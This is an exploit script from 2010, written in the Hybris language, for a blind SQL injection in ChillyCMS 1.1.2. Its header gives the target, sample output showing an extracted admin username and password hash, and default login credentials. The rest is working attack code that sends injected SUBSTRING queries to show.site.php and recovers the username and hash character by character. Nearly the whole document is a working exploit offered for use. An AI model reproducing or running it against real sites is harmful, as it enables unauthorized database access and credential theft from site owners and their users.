#!/usr/bin/hybris
#################################################################################
#
# Exploit Title: ChillyCMS Blind Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link:
http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
# Version: 1.1.2
# Tested on: Win/Linux
#
#
# Example:
# [user@user Advisories]$ hybris chillycms.hy
# Searching Username... :
# admin
# Searching MD5... :
# d033e22ae348aeb5660fc2140aec35850c4da997
#
#
# DEFAULT USERNAME AND PASSWORD:
# User: jens
# Pass: demo
#
# Thanks to evilsocket for Hybris
# http://www.hybris-lang.org/
#################################################################################

import std.*;

query1 = "4/**/AND/**/(SELECT/**/SUBSTRING(";
query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char(";

chars =
[48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f'];
usr = "";
password = "";

i=1;
println("Searching Username... : ");
while(1) {
found=false;
chrs = 'a' .. 'z';
foreach(char of chrs) {
_chrs = toint(char);
url =
"/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")";
html = http_get( "http://localhost", url );
if (html ~= "/name='user'/") {
usr += char;
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(usr);

i=1;
println("Searching MD5... : ");
while(1) {
found=false;
foreach(char of chars.keys()) {
url =
"/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")";
html = http_get( "http://localhost", url );
if (html ~= "/name='user'/") {
password += chars[char];
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(password);
println();